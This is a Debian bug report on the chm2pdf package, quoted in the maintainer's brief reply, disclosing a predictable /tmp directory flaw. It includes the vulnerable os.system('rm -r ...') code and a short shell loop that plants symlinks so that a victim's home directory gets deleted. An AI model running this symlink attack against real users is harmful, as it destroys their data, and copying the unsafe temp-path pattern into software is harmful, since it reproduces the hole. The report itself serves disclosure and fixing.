Thanks for the report
-Steve
On Oct 11, 2008, at 7:43 PM, Karol Lewandowski <[EMAIL PROTECTED]> wrote:
Package: chm2pdf
Version: 0.9-2
Severity: grave
Justification: causes non-serious data loss
There are several problems with this package:
1. chm2pdf creates /tmp/chm2pdf/{orig,work}/X directories.
(Where X is file basename, foo for foo.chm).
This makes script unusable for other users, i.e. userA runs chm2pdf
which creates /tmp/chm2pdf with userA owner, userB has no chance to
create files there
2. Malicious user could prepare directory structure which upon chm2pdf
execution could cause serious data loss.
from /usr/bin/chm2pdf:
CHM2PDF_TEMP_WORK_DIR='/tmp/chm2pdf/work'
CHM2PDF_TEMP_ORIG_DIR='/tmp/chm2pdf/orig'
...
CHM2PDF_WORK_DIR = CHM2PDF_TEMP_WORK_DIR + os.sep + basename
CHM2PDF_ORIG_DIR = CHM2PDF_TEMP_ORIG_DIR + os.sep + basename
...
os.system('rm -r '+CHM2PDF_ORIG_DIR+'/*')
os.system('rm -r '+CHM2PDF_WORK_DIR+'/*')
.
Malicious user could do e.g.
malicious$ mkdir /tmp/chm2pdf/{orig,work}
malicious$ cd /tmp/chm2pdf/orig
malicious$ for f in `find /home/victim/ -iname \*.chm -print`; do
ln -s /home/victim/ `basename ${f%%.chm}`
done
And ask user victim to convert any of his own .chm files.
Thanks.
-- System Information:
Debian Release: lenny/sid
APT prefers testing
APT policy: (500, 'testing')
Architecture: i386 (i686)
Kernel: Linux 2.6.27-rc7
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/dash
Versions of packages chm2pdf depends on:
ii htmldoc 1.8.27-3 HTML processor that
generates inde
ii libchm-bin 2:0.39-9 library for dealing
with Microsoft
ii python 2.5.2-2 An interactive high-
level object-o
ii python-chm 0.8.4-0.1+b1 Python binding for CHMLIB
ii python-support 0.8.4 automated rebuilding
support for P
chm2pdf recommends no packages.
chm2pdf suggests no packages.
-- no debconf information
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
